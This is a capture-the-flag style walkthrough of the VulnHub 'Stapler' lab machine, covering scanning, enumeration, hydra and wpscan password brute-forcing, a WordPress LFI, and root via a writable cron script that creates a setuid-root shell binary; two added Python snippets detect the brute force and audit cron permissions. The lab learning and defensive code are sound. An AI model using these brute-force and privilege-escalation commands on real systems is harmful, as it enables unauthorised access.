In reviewing multiple blogs and websites, Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework. My goal is to complete these challenges and document my findings along the way.

Setup:

I downloaded the Stapler Zip file from VulnHub.com and then extracted the contents to my local disk. I had issues with importing the OVA file into my instance of VMware on my Ubuntu 16.04 Workstation host. So, I imported the OVA file into VirtualBox after I renamed the Stapler.mf to Stapler.mf.old.

Victim Description:

The VulnHub.com site did not list any vulnerabilities, but it did note there was a text flag. The Description section noted that there were two paths to a limited shell and three paths to obtain root. I have included the vulnerabilities that I found below:

Information Gathering:

Since I knew the isolated network IP Address range, I used Nmap to perform a host discovery scan of the 172.27.254.0/24 subnet.

nmap -sn -n 172.27.254.0/24

Next, I used the Nmap command to perform a port scan, probing all TCP ports, OS detection, and then outputting the findings into three different file formats starting with the name of NmapFullScan.

FTP Enumeration:

Identifying vSFTP was utilizing Port 21, I decided to test access by using an anonymous FTP login.

Truncated passwd file

SSH Enumeration:

Using the information from the Nmap scan, I decided to connect to the system with SSH. Based on the banner, there appears to be a user named Barry.

hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr 172.27.254.41 ssh

I waited a few minutes, but did not have any positive results. So, I decided to continue to enumerate the system based on the other protocols found with Nmap.

SMB Enumeration:

Once again, using the information from the Nmap scan, I decided to launch enum4linux to perform all scanning on the Stapler host and output the content to a file named enum_41.txt.

Port 666 Enumeration:

Using the information from the Nmap scan, I decided to launch netcat to connect to TCP Port 666 on the Stapler system.

Web Enumeration:

Continuing with Nmap, I used the vuln NSE script and then output the findings into three different file formats starting with the name of NmapVulnScan.

sudo wpscan --url https://172.27.254.41:12380/blogblog/ --enumerate u,ap --disable-tls-checks --log /home/ptester/Stapler/wpscan_41.txt

WPScan: Plugins
WPScan: Enumerated Users
WPScan: Enumerated Users 10–20

WordPress Exploit:

Researching the WordPress plugins for vulnerabilities, I found that the Exploit-DB website noted an LFI in the embedded Advanced Video plugin. So, I downloaded the exploit and made the modifications for the blogblog URL.

import ssl

# Accept the self-signed certificate on port 12380 by turning off verification for urllib
ssl._create_default_https_context = ssl._create_unverified_context

With the modification, the script ran without issue. Great, but now what?

MySQL Enumeration:

Using the root credentials found within the .jpeg file, I used the MySQL client to enumerate the databases on Stapler.

WordPress Brute Force:

Prior to executing the WordPress exploit, I created a wp_users.txt file with the enumerated WordPress accounts. I then issued the wpscan command to brute force the wp_users.txt accounts against the rockyou.txt dictionary and then output the findings into the wp_creds.txt file.

sudo wpscan --url https://172.27.254.41:12380/blogblog/ --disable-tls-checks --usernames /home/ptester/Stapler/wp_users.txt --wordlist /pentest/password-recovery/dictionary/Passwords/Leaked-Databases/rockyou.txt --log /home/ptester/Stapler/wp_creds.txt

In less than 30 minutes, I was able to obtain the credentials for john.
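From the defender's side, a wpscan password attack like the one above is a burst of POST requests to wp-login.php from one source, and a 302 after the burst is the sign that a guess succeeded. The following detection over constructed web-server access-log lines is an added example, not part of the original walkthrough; the addresses, timestamps and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: client ident user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, timestamp, method, path, status) for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_wp_login_bruteforce(log_text, threshold=10, window=timedelta(minutes=5)):
    """Flag sources that POST to wp-login.php >= threshold times inside one window.
    A failed WordPress login re-renders the form (200); success redirects (302),
    so a 302 after the burst means the password guessing most likely worked."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].endswith("/wp-login.php"):
            events[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        start, peak, burst_seen, success_after = 0, 0, False, False
        for i, (ts, status) in enumerate(evs):
            while ts - evs[start][0] > window:  # slide the window forward
                start += 1
            count = i - start + 1
            peak = max(peak, count)
            burst_seen = burst_seen or count >= threshold
            success_after = success_after or (burst_seen and status == 302)
        if burst_seen:
            findings[ip] = {"peak_attempts": peak, "success_after_burst": success_after}
    return findings

def build_sample_log():
    """Constructed sample (documentation IPs): 12 failed guesses then one success
    from 203.0.113.7, plus a single ordinary failed login from 198.51.100.4."""
    base, fmt = datetime(2017, 8, 12, 10, tzinfo=timezone.utc), "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(13):
        t = (base + timedelta(seconds=3 * i)).strftime(fmt)
        status = "302 0" if i == 12 else "200 3456"
        lines.append(f'203.0.113.7 - - [{t}] "POST /blogblog/wp-login.php HTTP/1.1" {status}')
    lines.append(f'198.51.100.4 - - [{t}] "POST /blogblog/wp-login.php HTTP/1.1" 200 3456')
    return "\n".join(lines)
```

Feeding a real access log through detect_wp_login_bruteforce gives one entry per offending source; the success_after_burst flag separates noise from an account that actually needs a password reset.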

Remote Shell:

As previously noted, there were two paths to a limited shell. So, I documented both of the methods that I used.

Method 1 — WordPress Plugin:

Since the john account was listed as the first account, from the wpscan enumeration, I thought that the account may have been the admin account. So, I returned to the browser and entered the credentials.

Method 2 — MySQL, SELECT Statement:

In researching uploading shells with MySQL and PHPAdmin, I wanted to try to use a SELECT statement to upload a basic shell to the blogblog/wp-content/uploads/ directory. So, I connected to the system with MySQL.

Local Information Gathering and Enumeration:

First things first, I issued the uname -mra && cat /etc/*release* commands to gather information about the system.

Privilege Escalation:

As previously noted, there were three paths to root the system. So, I documented the methods that I used.

Method 1 — Stored Password:

Having credentials for SSH, I opened a terminal and launched SSH with the JKanode account. Unfortunately, this account was not able to authenticate. However, I was able to successfully authenticate with the peter account.

Method 2 — Kernel Exploit:

Knowing the OS and Kernel versions, I launched searchsploit to perform a web search for Ubuntu 16.04.

wget on Stapler
SimpleHTTPServer on second attacking system

Method 3 — Cron Job:

I have to admit that I had to research this method and review a few other posts prior to figuring this one out. In addition, I found a useful enumeration tool by Mike Czumak called linuxprivchecker. However, the amount of information was a little overwhelming for me at first.

echo '#include <unistd.h>
int main(void)
{
    /* runs as root once the cron job has made this binary setuid root */
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}' > rootpriv.c

I used the cat command to validate the newly created file.

echo 'chown root:root /tmp/rootpriv; chmod u+s /tmp/rootpriv;' > /usr/local/sbin/cron-logrotate.sh

Using the cat command, I validated the newly created contents within the cron-logrotate.sh script.
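The weakness this method abuses is a script that root's cron runs but that a non-root user can rewrite. The following audit, an added example and not the walkthrough's own code, parses crontab -l style lines and flags referenced scripts with a wrong owner or group/other write bits; the temp-directory scenario and file names are constructed for the demo.

```python
import os
import stat
import tempfile

def writable_by_others(path, owner_uid=0):
    """True if someone other than the expected owner could modify `path`: a different
    owner, or the group/other write bits set (as on a world-writable root cron script)."""
    st = os.lstat(path)
    return st.st_uid != owner_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def cron_commands(crontab_text):
    """Yield the first word of each command in `crontab -l` style lines
    (five schedule fields, then the command); comments and VAR=value lines are skipped."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            yield fields[5].split()[0]

def audit_cron_scripts(crontab_text, owner_uid=0):
    """Return the cron commands (existing absolute paths) a non-owner could rewrite.
    On a real host, pass root's crontab and owner_uid=0; the demo below uses the
    current user because it cannot create root-owned files."""
    return [cmd for cmd in cron_commands(crontab_text)
            if cmd.startswith("/") and os.path.exists(cmd) and writable_by_others(cmd, owner_uid)]

def demo():
    """Constructed scenario: two scripts in a temp dir, one mode 755 and one 777,
    both referenced from a crontab (assumed file names, not the Stapler host's)."""
    d = tempfile.mkdtemp()
    safe, weak = os.path.join(d, "backup.sh"), os.path.join(d, "cron-logrotate.sh")
    for path, mode in ((safe, 0o755), (weak, 0o777)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = (
        "# m h dom mon dow command\n"
        "PATH=/usr/local/sbin:/usr/sbin:/usr/bin\n"
        f"*/5 * * * * {safe}\n"
        f"*/5 * * * * {weak} >/dev/null 2>&1\n"
    )
    return audit_cron_scripts(crontab, owner_uid=os.getuid()), weak
```

The fix for anything flagged is chown root:root plus chmod 755 on the script (and on its parent directory), since a writable directory lets the file be replaced even when the file itself is locked down.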

Flag:

Having obtained root privileges (from Method 1), I issued the command sudo ls -al /root to view the contents of the root directory.

Cyber Security Enthusiast